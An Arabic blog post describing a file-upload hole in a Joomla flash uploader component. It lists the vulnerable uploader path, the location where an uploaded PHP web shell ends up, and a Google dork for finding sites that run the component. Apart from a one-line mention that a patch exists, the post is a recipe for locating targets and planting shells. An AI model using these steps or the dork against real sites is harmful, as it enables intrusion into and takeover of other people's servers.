ثغرة تحميل ملفات في سكريبت جوملا (ثغرة ابلود) - shell uploder bugs

السلام عليكم ورحمة الله
 ثغرة تحميل ملفات في سكريبت جوملا (ثغرة ابلود) - shell uploder bugs
هذه ثغرة في سكريبت جوملا تمكن المخترق من رفع ملفات غير مرغوب فيها ( شل مثلا) :

http://localhost/administrator/components/com_joomla_flash_uploader/tfu/tfu_210.swf 
  مسار الملف : في حالة رفع شل فهو طبعا إما jpg او php
http://localhost//images/stories/shell.php 

بالنسبة لعشاق العم جوجل فيمكنهم البحث عن طريق هذا الدورك :



inurl:index.php?option=com_joomla_flash_uploader 


لمن يستخدمون السكريبت : الترقيع موجود في الموقع الرسمي :)

في أمان الله :)

المشاركات الشائعة من هذه المدونة

إيجاد ثغرة في منتديات أحلى منتدى

الهندسة العكسية في لينكس - Reverse Engineering in linux

apache vs iis - مقارنة ميزات وعيوب اباتشي و إيس